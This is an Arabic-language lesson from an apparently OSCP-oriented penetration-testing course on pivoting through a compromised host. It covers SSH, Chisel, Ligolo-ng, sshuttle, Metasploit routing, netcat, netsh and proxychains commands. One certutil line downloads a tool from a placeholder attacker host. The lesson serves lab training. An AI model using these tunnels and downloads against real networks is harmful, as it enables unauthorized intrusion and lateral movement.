ما بعد الاستغلال وتصعيد الصلاحيات
التمحور وإعادة توجيه المنافذ
4 دقيقة للقراءة
التمحور يسمح لك بالوصول لقطاعات الشبكة الداخلية من خلال مضيف مخترق. هذا ضروري لجزء Active Directory في OSCP.
فهم التمحور
المهاجم ────────> المضيف المخترق ────────> الشبكة الداخلية
10.10.14.5 192.168.1.10 172.16.1.0/24
(ثنائي التوصيل)
إعادة توجيه منافذ SSH
إعادة التوجيه المحلي للمنفذ
توجيه منفذ بعيد لجهازك المحلي:
# الصيغة
ssh -L [local_port]:[target_ip]:[target_port] user@pivot_host
# مثال: الوصول لخادم ويب داخلي
ssh -L 8080:172.16.1.20:80 user@192.168.1.10
# الآن تصفح: http://localhost:8080
# مثال: الوصول لـ SMB داخلي
ssh -L 445:172.16.1.20:445 user@192.168.1.10
# الآن استخدم: smbclient //localhost/share
إعادة توجيه المنفذ الديناميكي (وكيل SOCKS)
إنشاء وكيل SOCKS من خلال المحور:
# إنشاء وكيل SOCKS على المنفذ 1080
ssh -D 1080 user@pivot_host
# تكوين الأدوات لاستخدام الوكيل
proxychains nmap -sT 172.16.1.0/24
proxychains curl http://172.16.1.20
# تحرير /etc/proxychains.conf
socks4 127.0.0.1 1080
إعادة التوجيه البعيد للمنفذ
كشف خدمة محلية للشبكة البعيدة:
# الصيغة
ssh -R [remote_port]:[local_ip]:[local_port] user@pivot_host
# مثال: كشف خادم الويب المحلي
ssh -R 8080:127.0.0.1:80 user@pivot_host
# المستخدمون البعيدون يمكنهم الوصول لخادمك على pivot_host:8080
Chisel (موصى به لـ OSCP)
Chisel هو نفق TCP/UDP سريع يُنقل عبر HTTP.
الإعداد
# على المهاجم (وضع الخادم)
chisel server -p 8000 --reverse
# على المضيف المحور (وضع العميل - عكسي)
chisel client attacker-ip:8000 R:1080:socks
أمثلة إعادة توجيه المنفذ
# وكيل SOCKS عكسي
# الخادم: chisel server -p 8000 --reverse
# العميل: chisel client 10.10.14.5:8000 R:1080:socks
# استخدم: proxychains nmap 172.16.1.20
# توجيه منفذ محدد
# الخادم: chisel server -p 8000 --reverse
# العميل: chisel client 10.10.14.5:8000 R:3389:172.16.1.20:3389
# الاتصال: rdesktop localhost:3389
Ligolo-ng (بديل حديث)
# على المهاجم
ligolo-proxy -selfcert
# على المضيف المحور
ligolo-agent -connect attacker-ip:11601 -ignore-cert
# في واجهة ligolo-proxy
session
start
SSHuttle (Linux إلى Linux)
# توجيه كل حركة المرور للشبكة الداخلية
sshuttle -r user@pivot_host 172.16.1.0/24
# شبكات متعددة
sshuttle -r user@pivot_host 172.16.1.0/24 10.10.10.0/24
تمحور Metasploit (استخدم على جهاز واحد فقط)
# بعد الحصول على جلسة Meterpreter
meterpreter> run autoroute -s 172.16.1.0/24
# أو إضافة مسار يدوياً
msf> route add 172.16.1.0 255.255.255.0 [session_id]
# استخدام وكيل SOCKS
msf> use auxiliary/server/socks_proxy
msf> set SRVPORT 1080
msf> run
ترحيل Netcat
# إعادة توجيه منفذ بسيط (Linux)
mkfifo /tmp/f
cat /tmp/f | nc 172.16.1.20 80 | nc -lvp 8080 > /tmp/f
# Windows (باستخدام PowerShell)
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.1.20
تكوين Proxychains
الإعداد
# تحرير /etc/proxychains.conf
# علّق: proxy_dns
# أضف في الأسفل:
socks4 127.0.0.1 1080
# أو
socks5 127.0.0.1 1080
الاستخدام
# Nmap عبر الوكيل (TCP فقط!)
proxychains nmap -sT -Pn 172.16.1.20
# استطلاع SMB
proxychains smbclient -L //172.16.1.20 -N
# CrackMapExec
proxychains crackmapexec smb 172.16.1.0/24
أدوات تمحور Windows
plink.exe (PuTTY)
# تحميل plink
certutil -urlcache -split -f http://attacker/plink.exe plink.exe
# توجيه منفذ ديناميكي (SOCKS)
plink.exe -ssh -D 1080 user@attacker-ip
# توجيه منفذ محلي
plink.exe -ssh -L 8080:172.16.1.20:80 user@attacker-ip
إعادة توجيه منفذ netsh
# إضافة إعادة توجيه منفذ
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=8080 connectaddress=172.16.1.20 connectport=80
# إظهار التوجيهات
netsh interface portproxy show all
# إزالة التوجيه
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=8080
ورقة غش التمحور
| الأداة | حالة الاستخدام | الأمر |
|---|---|---|
| SSH -L | توجيه محلي | ssh -L 8080:target:80 user@pivot |
| SSH -D | وكيل SOCKS | ssh -D 1080 user@pivot |
| Chisel | تجاوز جدار الحماية | chisel client ip:port R:1080:socks |
| SSHuttle | توجيه حركة المرور | sshuttle -r user@pivot 10.0.0.0/24 |
| Proxychains | استخدام الوكيل | proxychains nmap target |
سير عمل التمحور
1. تحديد الشبكات الداخلية من المضيف المخترق
└── ip a، route، arp -a
2. إعداد نفق/محور
└── Chisel، SSH، Ligolo
3. تكوين proxychains
└── /etc/proxychains.conf
4. استطلاع الشبكة الداخلية
└── proxychains nmap -sT
5. مهاجمة الأهداف الداخلية
└── proxychains crackmapexec smb
مع إتقان التمحور، سننتقل لهجمات Active Directory ومحاكاة الاختبار في الوحدة الأخيرة. :::